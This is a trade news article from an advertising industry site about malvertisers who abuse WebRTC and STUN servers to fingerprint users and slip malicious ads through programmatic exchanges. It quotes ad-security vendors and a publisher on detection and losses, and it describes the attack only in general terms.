Home Online Advertising Bad Actors Are Taking Advantage Of Genuine Web Infrastructure To Hide The Spread Of Malware

Bad Actors Are Taking Advantage Of Genuine Web Infrastructure To Hide The Spread Of Malware

SHARE:

When people join a browser-based video conference call, their top worry is usually whether their hair looks OK.

But there’s a bigger concern lurking.

WebRTC, the open source technology used by browsers and apps to enable real-time communications over the internet, is being exploited to camouflage the dissemination of malware-infected ads.

Programmatic exchanges appear to be the main and unwitting distribution point for malware spread through the manipulation of the WebRTC protocol, according to Israeli ad security company GeoEdge, which first encountered the scheme in October 2018. About 87% of the attacks observed by GeoEdge have taken place through header bidding auctions outside of a publisher’s primary ad server.

GeoEdge estimates publishers will lose around $325 million in 2019 due to WebRTC malvertising.

Cybersecurity startup DEVCON, which also discovered the WebRTC vulnerability late last year, has noticed a substantial increase in its exploitation over the last two weeks, said company CEO and founder Maggie Louie.

When an advertiser wins a programmatic auction in a legitimate scenario, an ad is served with a Javascript tag to render it.

But with WebRTC malvertising, bad actors misuse the protocol by launching a script that extracts information about a user’s browser, including the local IP address and referring URL, to determine whether a machine belongs to a security researcher or if there’s a verification vendor afoot.

If fraudsters suspect that a session is being monitored for malicious activity, they won’t attack. But if the coast is clear, they insert malicious code into a piece of ad creative – usually one that was just stolen from around the internet – and serve that ad through a legitimate ad exchange.

From there, a user is often forcibly redirected to known spam and phishing sites. (“You just won an Amazon gift card!”)

The practice is particularly tricky to detect and intercept, because traditional domain-based security methods don’t apply, said GeoEdge CEO Amnon Siev.

Subscribe

AdExchanger Daily

Get our editors’ roundup delivered to your inbox every weekday.

WebRTC relies on legit third-party servers, known as STUN (SessionTraversal of Utilities for Network Address Translators), to function and power peer-to-peer communication. The servers are also backed and used by valid entities such as Google, Mozilla and Microsoft.

That means the attacks are being launched through a benign entity, and there’s no domain to blacklist. Blocking an entire STUN server would cut off a lot of bona fide activity.

And so GeoEdge uses behavioral heuristics, or analyses, to observe how ad creative performs in the wild.

If something looks amiss, GeoEdge’s manual research team, comprised of former Israeli army security experts, analyzes the code to identify specific exploits or the mechanisms of an attack. GeoEdge uses that information to create a signature for the exploit and block the specific programmatic tag.

Siev claims that six out of the 10 biggest exchanges and supply-side platforms were inadvertent conduits for WebRTC malvertising.

It’s a losing proposition for publishers. When users have a disagreeable or unexpected site experience, it leaves a bad taste in their mouth that they’ll most likely blame on the publisher.

PubGalaxy, a Bulgarian company that runs a programmatic platform for publishers, experiences this worry firsthand, because it also operates the technology website phonearena.com. (The site launched in 2001, and PubGalaxy was founded in 2013 to develop monetization tools based on the notion that a publisher knows what a publisher needs.)

“Our primary concern is the experience we provide to our readers. With the escalation of malicious ad attacks, bad user experiences are becoming a true concern for us,” said Ivan Ivanov, who ran biz dev for PhoneArena before becoming COO of PubGalaxy five years ago.

PubGalaxy has its own in-house ad quality team and partners with GeoEdge to block malicious ads. Every time a new type of exploit sneaks onto the scene, it’s a reminder that if there’s a vulnerability, someone will take advantage of it.

“This type of malvertising creates quite a disruption for us,” Ivanov said. “And it’s clear that the attacks will get even more sophisticated in the future.”

Must Read

The FTC's latest staff report has strong message for social media and streaming video platforms: Stop engaging in the "vast surveillance" of consumers.

FTC Denounces Social Media And Video Streaming Platforms For ‘Privacy-Invasive’ Data Practices

The FTC’s latest staff report has strong message for social media and streaming video platforms: Stop engaging in the “vast surveillance” of consumers.

Publishers Feel Seen At The Google Ad Tech Antitrust Trial

Publishers were encouraged to see the DOJ highlight Google’s stranglehold on the ad server market and its attempts to weaken header bidding.

Albert Thompson, Managing Director, Digital at Walton Isaacson

To Cure What Ails Digital Advertising, Marketers And Publishers Must Get Back To Basics

Albert Thompson, a buy-side veteran with 20+ years of experience, weighs in on attention metrics, the value of MFA sites, brand safety backlash and how publishers can improve their inventory.

Privacy! Commerce! Connected TV! Read all about it. Subscribe to AdExchanger Newsletters
A comic depiction of Google's ad machine sucking money out of a publisher.

DOJ vs. Google, Day Five Rewind: Prebid Reality Check, Unfair Rev Share And Jedi Blue (Sorta)

Someone will eventually need to make a Netflix-style documentary about the Google ad tech antitrust trial happening in Virginia. (And can we call it “You’ve Been Ad Served?”)

Comic: Alphabet Soup

Buried DOJ Evidence Reveals How Google Dealt With The Trade Desk

In the process of the investigation into Google, the Department of Justice unearthed a vast trove of separate evidence. Some of these findings paint a whole new picture of how Google interacts and competes with its main DSP rival, The Trade Desk.

Comic: The Unified Auction

DOJ vs. Google, Day Four: Behind The Scenes On The Fraught Rollout Of Unified Pricing Rules

On Thursday, the US district court in Alexandria, Virginia boarded a time machine back to April 18, 2019 – the day of a tense meeting between Google and publishers.